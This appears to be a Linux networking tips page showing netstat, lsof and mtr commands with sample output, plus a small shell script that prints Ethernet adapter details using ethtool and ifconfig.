udp        0      0 0.0.0.0:111             0.0.0.0:*
udp        0      0 192.168.100.4:123       0.0.0.0:*
udp        0      0 127.0.0.1:123           0.0.0.0:*
udp        0      0 0.0.0.0:123             0.0.0.0:*
udp        0      0 192.168.100.255:137     0.0.0.0:*
udp        0      0 192.168.100.4:137       0.0.0.0:*
udp        0      0 0.0.0.0:137             0.0.0.0:*
udp        0      0 192.168.100.255:138     0.0.0.0:*
udp        0      0 192.168.100.4:138       0.0.0.0:*
udp        0      0 0.0.0.0:138             0.0.0.0:*
udp        0      0 0.0.0.0:4520            0.0.0.0:*
udp        0      0 0.0.0.0:4569            0.0.0.0:*
udp        0      0 0.0.0.0:5000            0.0.0.0:*
udp        0      0 0.0.0.0:912             0.0.0.0:*
udp        0      0 0.0.0.0:5060            0.0.0.0:*
udp        0      0 0.0.0.0:1900            0.0.0.0:*
udp        0      0 0.0.0.0:11422           0.0.0.0:*
udp6       0      0 :::111                  :::*
udp6       0      0 fe80::fa1a:67ff:fe1:123 :::*
udp6       0      0 fe80::7a94:7b57:123     :::*
udp6       0      0 2001:470:1f06:1b5:::123 :::*
udp6       0      0 ::1:123                 :::*
udp6       0      0 :::123                  :::*
udp6       0      0 :::912                  :::*
udp6       0      0 :::39542                :::*

How to list all listening connections on a Linux box.


netstat --listening

How to list all open ports on a Linux box.

homer@deusexmachina ~ $ lsof -i
COMMAND    PID  USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
gvfsd-smb 5755 homer   11u  IPv4  16578      0t0  TCP 192.168.100.4:36294->192.168.100.1:netbios-ssn (ESTABLISHED)
gvfsd-smb 5755 homer   12u  IPv4  16578      0t0  TCP 192.168.100.4:36294->192.168.100.1:netbios-ssn (ESTABLISHED)

The lsof -i command will list all open ports on your system.

Type: sudo apt-get install sockstat and then you gain a cool FreeBSD command for querying open ports.

This netstat parameter lists the results with the FQDN.

homer@deusexmachina ~ $ netstat  -vat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost:4101          *:*                     LISTEN
tcp        0      0 *:netbios-ssn           *:*                     LISTEN
tcp        0      0 *:sunrpc                *:*                     LISTEN
tcp        0      0 *:cisco-sccp            *:*                     LISTEN
tcp        0      0 localhost:ipp           *:*                     LISTEN
tcp        0      0 *:https                 *:*                     LISTEN
tcp        0      0 *:microsoft-ds          *:*                     LISTEN
tcp        0    256 192.168.100.4:https     153.107.97.168:53761    ESTABLISHED
tcp      340      0 192.168.100.4:36294     192.168.100:netbios-ssn ESTABLISHED
tcp6       0      0 [::]:netbios-ssn        [::]:*                  LISTEN
tcp6       0      0 [::]:sunrpc             [::]:*                  LISTEN
tcp6       0      0 localhost:ipp           [::]:*                  LISTEN
tcp6       0      0 [::]:https              [::]:*                  LISTEN
tcp6       0      0 [::]:microsoft-ds       [::]:*                  LISTEN

A useful script for gaining information about your Ethernet adapter.

This useful shell script will print information about your Ethernet or Wireless adapter. This is very useful for getting a lot of information at once.


#!/bin/sh

DEV="eno16777736"

echo "Showing information for the active network interface: $DEV."

echo -e "-*- \e[1mGet timestamping information for your Ethernet device.\e[0m -*-"
echo

ethtool -T $DEV

echo -e "-*- \e[1mPrinting main information about the Ethernet device.\e[0m -*-"
echo

ethtool $DEV

echo -e "-*- \e[1mPrinting out the permanent hardware address.\e[0m -*-"

ethtool -P $DEV

echo
echo

echo -e "-*- \e[1mPrinting Ethernet adapter IP address.\e[0m -*-"

# This tip from: http://unix.stackexchange.com/questions/103241/how-to-use-ifconfig-to-show-active-interface-only

ifconfig | grep "inet " | grep -v 127.0.0.1 | sed -e 's/Bcast//' | cut -d: -f2

This script uses the ethtool command. This is very good for gaining IP address info as well as other useful information.

The mtr command for Linux. Another way to trace network hops using the command line.

The mtr command for Linux is another good way to trace network hops. Use it like this: mtr --report [HOST]


homer@deusexmachina ~ $ mtr --report yahoo.com
Start: Mon Jul 28 07:42:16 2014
HOST: deusexmachina Loss% Snt Last Avg Best Wrst StDev
1.|-- 192.168.100.1 0.0% 10 0.3 0.3 0.3 0.4 0.0
2.|-- 185.3.148.122.network.m2c 0.0% 10 29.0 29.3 28.9 30.0 0.0
3.|-- be2-v547-bsr02-sydnmtc.sy 0.0% 10 29.9 30.4 29.7 31.0 0.0
4.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
5.|-- bundle-ether21.ken39.sydn 0.0% 10 32.6 36.4 32.6 41.4 3.4
6.|-- bundle-ether6.ken-core4.s 0.0% 10 31.9 32.6 30.7 34.1 0.9
7.|-- bundle-ether19.ken-core10 0.0% 10 31.4 32.5 31.4 33.6 0.5
8.|-- Bundle-ether18.pad-gw2.sy 0.0% 10 32.9 32.2 30.3 34.1 0.9
9.|-- bundle-ether1.sydp-core01 0.0% 10 33.8 32.7 30.2 34.6 1.3
10.|-- i-0-1-0-3.paix-core01.bx. 0.0% 10 169.8 170.3 168.0 174.3 1.7
11.|-- i-0-5-0-2.paix02.bi.telst 0.0% 10 167.6 168.2 165.7 172.2 1.5
12.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
13.|-- ae-6.pat2.swp.yahoo.com 0.0% 10 186.2 186.8 185.0 192.4 2.0
14.|-- ae-5.pat2.gqb.yahoo.com 0.0% 10 201.0 198.3 189.3 201.9 5.0
15.|-- ae-0.msr2.gq1.yahoo.com 0.0% 10 190.7 193.9 189.6 219.2 8.9
16.|-- UNKNOWN-67-195-1-X.yahoo. 0.0% 10 191.5 196.9 190.2 200.8 4.6
17.|-- et-17-1.fab6-1-gdc.gq1.ya 10.0% 10 190.7 194.4 190.7 201.3 4.5
18.|-- po-14.bas1-7-prd.gq1.yaho 10.0% 10 203.2 201.7 199.1 204.0 1.6
19.|-- ir1.fp.vip.gq1.yahoo.com 10.0% 10 191.3 190.9 189.8 192.5 0.6

Use the –csv parameter like this to output in CSV format.


mtr --report yahoo.com --csv

If you want the mtr command to output using a curses interface with bold text highlighting; use this command.


mtr --report yahoo.com --curses


The --tcp parameter to mtr will use TCP SYN packets instead of ICMP echo. This is a fast way of performing a traceroute of network hops.

homer@deusexmachina ~ $ mtr --report yahoo.com --tcp
Start: Mon Jul 28 07:55:37 2014
HOST: deusexmachina Loss% Snt Last Avg Best Wrst StDev
1.|-- 192.168.100.1 0.0% 10 0.3 0.3 0.3 0.4 0.0
2.|-- 185.3.148.122.network.m2c 0.0% 10 29.8 30.1 29.5 31.3 0.3
3.|-- be2-v547-bsr02-sydnmtc.sy 0.0% 10 31.7 32.0 31.4 33.3 0.3
4.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
5.|-- bundle-ether21.ken39.sydn 0.0% 10 36.0 37.0 32.6 43.1 3.0
6.|-- bundle-ether6.ken-core4.s 0.0% 10 33.0 33.9 32.3 36.1 1.1
7.|-- bundle-ether19.ken-core10 0.0% 10 34.2 33.3 31.9 34.4 0.7
8.|-- Bundle-ether18.pad-gw2.sy 0.0% 10 34.4 34.0 31.4 37.0 1.4
9.|-- bundle-ether1.sydp-core01 0.0% 10 32.2 34.6 32.1 36.4 1.4
10.|-- i-0-3-0-1.paix-core01.bx. 0.0% 10 176.6 170.9 168.2 176.6 2.3
11.|-- i-0-0-0-2.paix02.bi.telst 0.0% 10 170.4 169.6 168.3 174.9 1.9
12.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
13.|-- ae-7.pat2.dnx.yahoo.com 0.0% 10 194.2 198.9 194.2 228.1 10.4
14.|-- ae-6.pat1.nez.yahoo.com 0.0% 10 203.3 206.9 202.8 223.4 6.3
15.|-- ae-0.msr2.ne1.yahoo.com 0.0% 10 215.3 209.4 201.9 225.8 8.6
16.|-- ae-0.clr1-a-gdc.ne1.yahoo 10.0% 10 214.0 213.6 202.8 220.8 4.6
17.|-- UNKNOWN-98-138-97-X.yahoo 10.0% 10 213.5 209.0 203.8 221.4 6.3
18.|-- po-10.bas1-7-prd.ne1.yaho 10.0% 10 215.1 212.3 204.4 221.1 5.9
19.|-- ir1.fp.vip.ne1.yahoo.com 10.0% 10 266.0 252.0 212.0 301.6 31.8

And finally, the –report-wide parameter will show a wider display of the output.


homer@deusexmachina ~ $ mtr --report yahoo.com --tcp --report-wide
Start: Mon Jul 28 07:57:34 2014
HOST: deusexmachina Loss% Snt Last Avg Best Wrst StDev
1.|-- 192.168.100.1 0.0% 10 0.3 0.3 0.3 0.4 0.0
2.|-- 185.3.148.122.network.m2core.net.au 0.0% 10 30.2 30.0 29.4 30.8 0.0
3.|-- be2-v547-bsr02-sydnmtc.syd.nsw.m2core.net.au 0.0% 10 32.2 31.8 31.3 32.5 0.0
4.|-- 66.3.148.122.network.m2core.net.au 70.0% 10 32.4 364.2 32.4 1027. 574.4
5.|-- bundle-ether21.ken39.sydney.telstra.net 0.0% 10 39.6 37.8 32.6 43.0 3.4
6.|-- bundle-ether6.ken-core4.sydney.telstra.net 0.0% 10 35.4 34.4 31.9 37.4 1.8
7.|-- bundle-ether19.ken-core10.sydney.telstra.net 0.0% 10 35.3 33.4 31.4 35.3 0.8
8.|-- Bundle-ether18.pad-gw2.sydney.telstra.net 0.0% 10 33.1 33.8 32.1 37.0 1.3
9.|-- bundle-ether1.sydp-core01.sydney.reach.com 0.0% 10 34.7 33.3 31.5 34.7 0.9
10.|-- i-0-3-0-2.paix-core01.bx.telstraglobal.net 0.0% 10 168.3 171.7 168.3 176.8 2.6
11.|-- i-0-0-0-7.paix02.bi.telstraglobal.net 0.0% 10 170.1 169.5 168.2 171.1 0.7
12.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
13.|-- ae-7.pat2.dnx.yahoo.com 0.0% 10 227.5 202.9 194.1 227.5 11.0
14.|-- ae-5.pat2.nez.yahoo.com 0.0% 10 210.4 205.1 202.9 210.4 2.4
15.|-- ae-0.msr1.ne1.yahoo.com 0.0% 10 203.7 209.7 203.0 216.5 6.3
16.|-- UNKNOWN-98-138-97-X.yahoo.com 10.0% 10 214.3 213.5 204.6 217.4 4.1
17.|-- UNKNOWN-98-138-97-X.yahoo.com 10.0% 10 216.2 211.1 203.0 216.5 5.8
18.|-- po-14.bas2-7-prd.ne1.yahoo.com 10.0% 10 214.8 209.2 203.0 217.5 6.0
19.|-- ir1.fp.vip.ne1.yahoo.com 10.0% 10 265.8 234.2 212.3 301.5 34.2